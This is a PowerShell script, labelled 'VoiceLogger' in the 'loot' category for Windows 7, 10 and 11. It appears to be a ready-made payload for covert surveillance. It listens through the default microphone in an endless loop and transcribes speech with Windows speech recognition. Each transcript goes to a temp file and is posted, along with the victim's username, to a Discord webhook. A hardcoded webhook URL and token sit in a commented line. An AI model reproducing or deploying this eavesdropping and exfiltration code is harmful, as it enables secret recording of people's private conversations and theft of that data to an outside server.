######################################################################################
#                                  |  ╭━╮╭━╮╱╱╱╱╭╮╱╱╱╱╱╭╮╭╮╭╮╱╱╱╱╱╱╱╭━━━━╮╱╱╱╱╭╮     #
# Title        : VoiceLogger       |  ┃┃╰╯┃┃╱╱╱╱┃┃╱╱╱╱╱┃┃┃┃┃┃╱╱╱╱╱╱╱┃╭╮╭╮┃╱╱╱╱┃┃     #
# Author       : MarkieWay         |  ┃╭╮╭╮┣━━┳━┫┃╭┳┳━━┫┃┃┃┃┣━━┳╮╱╭╮╰╯┃┃┣┻━┳━━┫┃╭━━╮ #
# Version      : 1.0               |  ┃┃┃┃┃┃╭╮┃╭┫╰╯╋┫┃━┫╰╯╰╯┃╭╮┃┃╱┃┃╱╱┃┃┃╭╮┃╭╮┃┃┃━━┫ #
# Category     : loot              |  ┃┃┃┃┃┃╭╮┃┃┃╭╮┫┃┃━╋╮╭╮╭┫╭╮┃╰━╯┃╱╱┃┃┃╰╯┃╰╯┃╰╋━━┃ #
# Target       : Windows 7,10,11   |  ╰╯╰╯╰┻╯╰┻╯╰╯╰┻┻━━╯╰╯╰╯╰╯╰┻━╮╭╯╱╱╰╯╰━━┻━━┻━┻━━╯ #
#                                  |  ╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╭━╯┃                  #
#                                  |  ╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╰━━╯                  #
# _________________________________|_________________________________________________#
######################################################################################
function DC-Upload {

	[CmdletBinding()]
	param (
		[parameter(Position=0,Mandatory=$False)]
		[string]$text 
	)

	# $dc = 'https://discord.com/api/webhooks/1166839064079642765/dvnpB-0NFAZxIpj4LAKFAcduvro7oV3LYzt5ujXF5pVUqbwIM9mIMIIAAARVuFav0Mbx'

	$Body = @{
	  'username' = $env:username
	  'content' = $text
	}

	if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc  -Method Post -Body ($Body | ConvertTo-Json)};
}



function voiceLogger {

    Add-Type -AssemblyName System.Speech
    $recognizer = New-Object System.Speech.Recognition.SpeechRecognitionEngine
    $grammar = New-Object System.Speech.Recognition.DictationGrammar
    $recognizer.LoadGrammar($grammar)
    $recognizer.SetInputToDefaultAudioDevice()

    while ($true) {
        $result = $recognizer.Recognize()
        if ($result) {
            $results = $result.Text
            Write-Output $results
            $log = "$env:tmp/VoiceLog.txt"
            echo $results > $log
            $text = get-content $log -raw
            DC-Upload $text

            # Use a switch statement with the $results variable
            switch -regex ($results) {
                '\bnote\b' {saps notepad}
                '\bexit\b' {break}
            }
        }
    }
    Clear-Content -Path $log
}

voiceLogger